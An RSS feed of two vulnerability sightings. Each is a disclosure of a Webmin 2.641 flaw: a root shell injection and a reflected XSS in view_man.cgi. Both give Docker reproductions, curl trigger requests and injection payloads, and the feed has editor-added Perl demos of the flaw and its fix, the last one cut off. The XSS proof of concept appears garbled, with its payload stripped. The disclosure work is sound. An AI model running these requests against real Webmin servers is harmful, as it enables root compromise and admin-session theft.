<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the 10 most recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 18 Jun 2026 15:12:39 +0000</lastBuildDate>
    <item>
      <title>b63c0c18-acc0-4eeb-b89b-66966105ac05</title>
      <link>https://vulnerability.circl.lu/sighting/b63c0c18-acc0-4eeb-b89b-66966105ac05/export</link>
      <description>{"uuid": "b63c0c18-acc0-4eeb-b89b-66966105ac05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/0153f5bf20c868cd82dca3e99a9e70a4", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). 
On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &amp;amp;backquote_command(\"$config{'man2html_path'} -v 2&amp;gt;&amp;amp;1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i &amp;amp;&amp;amp; $1 &amp;gt;= 3) {\n    # New version uses a different syntax!\n    $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&amp;amp;sec=\\\\\\${section}&amp;amp;opts=$in{'opts'}\\\" --bare\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) 
in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html &amp;gt;=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl\n  # Install Webmin 2.641 ...\n  # Install Earl Hood man2html &amp;gt;=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n  # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&amp;amp;pass=ClassB!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] 
\"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **7.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` &amp;gt;=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-024 is the incomplete-coverage variant on the shell-injection axis (and the companion K-025 XSS is the incomplete-coverage variant on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). 
Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:15.000000Z"}</description>
      <content:encoded>{"uuid": "b63c0c18-acc0-4eeb-b89b-66966105ac05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/0153f5bf20c868cd82dca3e99a9e70a4", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). 
On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &amp;amp;backquote_command(\"$config{'man2html_path'} -v 2&amp;gt;&amp;amp;1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i &amp;amp;&amp;amp; $1 &amp;gt;= 3) {\n    # New version uses a different syntax!\n    $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&amp;amp;sec=\\\\\\${section}&amp;amp;opts=$in{'opts'}\\\" --bare\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) 
in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html &amp;gt;=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl\n  # Install Webmin 2.641 ...\n  # Install Earl Hood man2html &amp;gt;=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n  # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&amp;amp;pass=ClassB!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] 
\"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **7.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` &amp;gt;=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-024 is the incomplete-coverage variant on the shell-injection axis (and the companion K-025 XSS is the incomplete-coverage variant on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). 
Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:15.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/b63c0c18-acc0-4eeb-b89b-66966105ac05/export</guid>
      <pubDate>Sun, 17 May 2026 15:23:15 +0000</pubDate>
    </item>
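<![CDATA[
Added example (editor's illustration, not code from the sighting above, from the gist it cites or from Webmin): a stand-alone Perl script that builds the `--cgiurl` argument the way the pre-patch new-man2html branch of `man/view_man.cgi` does, builds it again with the `quotemeta` hardening the patch commit applies, and hands both to `/bin/sh` so the breakout can be seen. The helper names, the `INJECTED` marker and the use of `echo` as a stand-in for the `nroff | man2html` pipeline are this example's own assumptions. The unsafe builder really does execute whatever is in opts, so run it only with the harmless constructed payload below.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Mirrors the pre-patch construction in view_man.cgi: the opts value is dropped raw
# into a double-quoted shell argument. Helper names are this example's own.
sub build_cgiurl_unsafe {
    my ($opts) = @_;
    # Perl's \\\${title} reaches the shell as \${title}, which inside double quotes
    # is the literal ${title} placeholder that man2html expands itself.
    return "--cgiurl \"view_man.cgi?page=\\\${title}&sec=\\\${section}&opts=$opts\" --bare";
}

# Hardened form, as in the quotemeta patch: every non-word byte of opts gets a
# backslash, so " ; $ ` and spaces can no longer terminate the quoted argument.
sub build_cgiurl_safe {
    my ($opts) = @_;
    my $qopts = quotemeta($opts);
    return "--cgiurl \"view_man.cgi?page=\\\${title}&sec=\\\${section}&opts=$qopts\" --bare";
}

# Hand the argument string to /bin/sh -c the way backquote_command() does, but with
# echo standing in for the nroff | man2html pipeline so nothing beyond printing runs.
sub run_through_shell {
    my ($args) = @_;
    return `echo $args 2>&1`;
}

# A breakout succeeded if the marker appears as a command of its own, i.e. on an
# output line by itself, instead of as text inside the echoed --cgiurl argument.
sub marker_executed {
    my ($out) = @_;
    return scalar grep { $_ eq 'INJECTED' } split /\n/, $out;
}

# Constructed payload: the advisory's URL-decoded opts value with touch swapped for an echo marker.
my $payload = q{";echo INJECTED;echo "};

for my $variant ([unsafe => \&build_cgiurl_unsafe], [quotemeta => \&build_cgiurl_safe]) {
    my ($name, $builder) = @$variant;
    my $out = run_through_shell($builder->($payload));
    printf "%-9s marker_executed=%d\n%s\n", $name, marker_executed($out), $out;
}
```

Run it with `perl quoting_demo.pl`. The unsafe variant prints `INJECTED` on a line of its own and reports `marker_executed=1`; the quotemeta variant keeps the whole payload inside the echoed argument and reports 0. Because the escaped value sits inside a double-quoted shell argument, the backslashes quotemeta adds before `;` and spaces are passed through to man2html as part of the URL template; a percent-encoded value, which is what the follow-up commit's `urlize` produces, contains no quotes, semicolons or spaces in the first place and needs no shell escaping at all.
]]>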
    <item>
      <title>efe92baf-b6aa-476f-8607-4cfb64f29693</title>
      <link>https://vulnerability.circl.lu/sighting/efe92baf-b6aa-476f-8607-4cfb64f29693/export</link>
      <description>{"uuid": "efe92baf-b6aa-476f-8607-4cfb64f29693", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/6da8ff9f0cecd699ca89b6d71654b71f", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). 
The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n    # Old version of man2html\n    $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n    $out =~ s/^.*Content-type:.*\\n//i;\n    $out =~ s/http:\\/\\///ig;\n    $out =~ s/\\?/\\?sec=/ig;\n    $out =~ s/\\+/&amp;amp;opts=$in{'opts'}&amp;amp;page=/ig;   # \u2190 K-025 sink: $in{'opts'} interpolated unescaped\n    $out =~ s/.*//isg;\n    ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&amp;amp;opts=$in{'opts'}&amp;amp;page=`. 
Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&amp;amp;show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n  # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&amp;amp;pass=AdminPass!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Baseline: count  in benign response\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=BENIGN\" \\\n  | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5  (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. 
The reflected response body contains the literal string verbatim (5 occurrences), in the form `&amp;amp;opts=alert(\"VERIFY_TOKEN\")&amp;amp;page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&amp;amp;opts=alert(\"VERIFY_TOKEN\")&amp;amp;page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&amp;amp;urlize()` at the link-generation site in 
`man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-025 is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:17.000000Z"}</description>
      <content:encoded>{"uuid": "efe92baf-b6aa-476f-8607-4cfb64f29693", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/6da8ff9f0cecd699ca89b6d71654b71f", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). 
The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n    # Old version of man2html\n    $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n    $out =~ s/^.*Content-type:.*\\n//i;\n    $out =~ s/http:\\/\\///ig;\n    $out =~ s/\\?/\\?sec=/ig;\n    $out =~ s/\\+/&amp;amp;opts=$in{'opts'}&amp;amp;page=/ig;   # \u2190 K-025 sink: $in{'opts'} interpolated unescaped\n    $out =~ s/.*//isg;\n    ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&amp;amp;opts=$in{'opts'}&amp;amp;page=`. 
Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&amp;amp;show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n  # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&amp;amp;pass=AdminPass!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Baseline: count  in benign response\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=BENIGN\" \\\n  | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5  (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. 
The reflected response body contains the literal string verbatim (5 occurrences), in the form `&amp;amp;opts=alert(\"VERIFY_TOKEN\")&amp;amp;page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&amp;amp;opts=alert(\"VERIFY_TOKEN\")&amp;amp;page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&amp;amp;urlize()` at the link-generation site in 
`man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-025 is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:17.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/efe92baf-b6aa-476f-8607-4cfb64f29693/export</guid>
      <pubDate>Sun, 17 May 2026 15:23:17 +0000</pubDate>
    </item>
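<![CDATA[
Added example (editor's illustration, not code from the sighting above, from the gist it cites or from Webmin): a Perl script that runs a constructed fragment of legacy man2html output through the pre-patch link-rewrite chain of `man/view_man.cgi` with the advisory's `opts` payload, then through the same chain with the value encoded first, once with an `html_escape`-style encoder and once with a `urlize`-style percent-encoder. The input HTML, the two encoder stand-ins and the helper names are this example's own assumptions, not Webmin's functions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed stand-in for legacy man2html output: cross-references rendered as page+section links.
my $man2html_html = <<'HTML';
<h1>LS(1)</h1>
<p>See also <a href="http://view_man.cgi?dir+1">dir(1)</a> and <a href="http://view_man.cgi?stat+2">stat(2)</a>.</p>
HTML

# Pre-patch rewrite chain from the legacy branch of view_man.cgi: opts goes into the
# regex replacement untouched, so it lands verbatim inside every rewritten href.
sub rewrite_links_unsafe {
    my ($html, $opts) = @_;
    $html =~ s/http:\/\///ig;
    $html =~ s/\?/\?sec=/ig;
    $html =~ s/\+/&opts=$opts&page=/ig;
    return $html;
}

# Stand-in for Webmin's urlize(): percent-encode every byte outside [A-Za-z0-9_].
# The right encoder for a value placed in a query string inside an attribute: the
# output can contain neither tag characters, attribute delimiters nor parameter separators.
sub urlize_like {
    my ($s) = @_;
    $s =~ s/([^A-Za-z0-9_])/sprintf("%%%02X", ord($1))/ge;
    return $s;
}

# Stand-in for Webmin's html_escape(): entity-encode the HTML-significant characters.
# Enough to stop tag and attribute breakout, but it does not URL-encode: a literal & or =
# in opts still splits the query string once the browser decodes &amp; back to &.
sub html_escape_like {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    return $s;
}

# Patched shape: encode once, then use the encoded value in the rewrite chain.
sub rewrite_links_safe {
    my ($html, $opts, $encoder) = @_;
    my $uopts = $encoder->($opts);
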